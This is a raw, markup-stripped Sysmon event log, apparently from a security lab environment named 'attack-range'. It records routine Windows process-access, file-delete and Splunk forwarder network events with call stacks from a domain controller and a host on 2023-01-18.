12:22:45.476{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1bb3c|C:\Windows\System32\ApplicationFrame.dll+100c1|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042939Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.476{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1aec2|C:\Windows\System32\ApplicationFrame.dll+1ca6f|C:\Windows\System32\ApplicationFrame.dll+100ae|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042938Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.476{FE4C2B44-E493-63C7-3A06-00000000AF02}71086228C:\Windows\system32\ApplicationFrameHost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinapi.appcore.dll+1e95e|C:\Windows\System32\twinapi.appcore.dll+1e3d1|C:\Windows\System32\twinapi.appcore.dll+1dbcc|C:\Windows\System32\twinapi.appcore.dll+1d863|C:\Windows\System32\ApplicationFrame.dll+1aec2|C:\Windows\System32\ApplicationFrame.dll+1ad31|C:\Windows\System32\ApplicationFrame.dll+10096|C:\Windows\System32\ApplicationFrame.dll+12a9a|C:\Windows\System32\ApplicationFrame.dll+11961|C:\Windows\System32\ApplicationFrame.dll+11289|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042937Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.471{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005992C:\Windows\Explorer.EXE{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\TwinUI.dll+12ccb9|C:\Windows\System32\TwinUI.dll+12d6ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000042936Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.418{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EF5A4EC2826C006F855A6BFE2319C7C,SHA256=D3D08D5AF0BEDE4B9E67B52B031F2EEA67B15118C47135CADB7AB3D99551E461,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042935Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.394{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961444C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042934Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.394{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x800000000000000016730Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:43.127{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50105-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000042933Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.380{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=91DBAE647150E9D47116AE675885B5AA,SHA256=8F93CC499A631F878CAE336200BBEB43981329C68D1161B4131DED94185B7676,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042932Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.376{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042931Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.375{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\System32\RPCRT4.dll+2bdcf|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042930Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.369{FE4C2B44-DDF4-63C7-A004-00000000AF02}47004228C:\Windows\system32\csrss.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042929Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.360{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+21a1b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ef1f|C:\Windows\SYSTEM32\psmserviceexthost.dll+b977|C:\Windows\SYSTEM32\psmserviceexthost.dll+a317|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042928Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.360{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+21a1b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ef1f|C:\Windows\SYSTEM32\psmserviceexthost.dll+b977|C:\Windows\SYSTEM32\psmserviceexthost.dll+a317|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042927Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.359{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042926Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.359{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E495-63C7-3D06-00000000AF02}7044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042925Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.259{FE4C2B44-DDF7-63C7-B404-00000000AF02}27283952C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\system32\activationmanager.dll+4eaa|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c 10341000x800000000000000042924Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.259{FE4C2B44-DDF7-63C7-B404-00000000AF02}27283952C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\system32\activationmanager.dll+4eaa|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c 10341000x800000000000000042923Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.222{FE4C2B44-D9F5-63C7-1000-00000000AF02}4041720C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6ce4|c:\windows\system32\fntcache.dll+17a6f|c:\windows\system32\fntcache.dll+1a637|c:\windows\system32\fntcache.dll+1aa6c|c:\windows\system32\fntcache.dll+501de|c:\windows\system32\fntcache.dll+4fee2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042922Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.175{FE4C2B44-E494-63C7-3B06-00000000AF02}61682740C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eb73|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\windows.storage.dll+30059|C:\Windows\System32\windows.storage.dll+2ffa1|C:\Windows\System32\windows.storage.dll+2f256|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000042921Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.175{FE4C2B44-E494-63C7-3B06-00000000AF02}61682740C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0f5|C:\Windows\System32\windows.storage.dll+13eade|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\windows.storage.dll+30059|C:\Windows\System32\windows.storage.dll+2ffa1|C:\Windows\System32\windows.storage.dll+2f256|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536|C:\Windows\System32\combase.dll+5dcea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x800000000000000042920Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.175{FE4C2B44-E494-63C7-3B06-00000000AF02}61682740C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\windows.storage.dll+30059|C:\Windows\System32\windows.storage.dll+2ffa1|C:\Windows\System32\windows.storage.dll+2f256|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f 10341000x800000000000000042919Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.175{FE4C2B44-E494-63C7-3B06-00000000AF02}61682740C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+13eac3|C:\Windows\System32\windows.storage.dll+13de13|C:\Windows\System32\windows.storage.dll+13dc99|C:\Windows\System32\windows.storage.dll+30059|C:\Windows\System32\windows.storage.dll+2ffa1|C:\Windows\System32\windows.storage.dll+2f256|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+54cf9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+61e4f|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+5e536 23542300x800000000000000042918Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.175{FE4C2B44-E494-63C7-3B06-00000000AF02}6168ATTACKRANGE\AdministratorC:\Windows\ImmersiveControlPanel\SystemSettings.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f18460fded109990.customDestinations-ms~RF299217.TMPMD5=4FCB2A3EE025E4A10D21E1B154873FE2,SHA256=90BF6BAA6F968A285F88620FBF91E1F5AA3E66E2BAD50FD16F37913280AD8228,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042917Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-E494-63C7-3B06-00000000AF02}61685980C:\Windows\ImmersiveControlPanel\SystemSettings.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+99ed7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9834|UNKNOWN(FFFFF8003D1872A8)|UNKNOWN(FFFFF3D9DFEB3998)|UNKNOWN(FFFFF3D9DFEAE645)|UNKNOWN(FFFFF3D9DFEAFB6A)|UNKNOWN(FFFFF3D9DFEADE26)|UNKNOWN(FFFFF8003CDFBC03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\Windows.UI.dll+16209|C:\Windows\System32\Windows.UI.dll+1427e|C:\Windows\System32\Windows.UI.dll+15fa8|C:\Windows\System32\twinapi.appcore.dll+12280 10341000x800000000000000042916Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\psmserviceexthost.dll+18aac|C:\Windows\SYSTEM32\psmserviceexthost.dll+e47e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e517|C:\Windows\SYSTEM32\psmserviceexthost.dll+e22a|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e78|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042915Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-DDF7-63C7-B404-00000000AF02}27283952C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\system32\activationmanager.dll+4eaa|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c 10341000x800000000000000042914Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:45.159{FE4C2B44-DDF7-63C7-B404-00000000AF02}27283952C:\Windows\system32\sihost.exe{FE4C2B44-E494-63C7-3B06-00000000AF02}6168C:\Windows\ImmersiveControlPanel\SystemSettings.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\system32\activationmanager.dll+4eaa|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+54d13|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+65d5b|C:\Windows\System32\combase.dll+6540c|C:\Windows\System32\combase.dll+650c2|C:\Windows\System32\combase.dll+639d8|C:\Windows\System32\combase.dll+6176d|C:\Windows\System32\combase.dll+60e3f|C:\Windows\System32\combase.dll+7c319|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+3528e|C:\Windows\System32\RPCRT4.dll+20c07|C:\Windows\System32\RPCRT4.dll+2125c 10341000x800000000000000042913Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 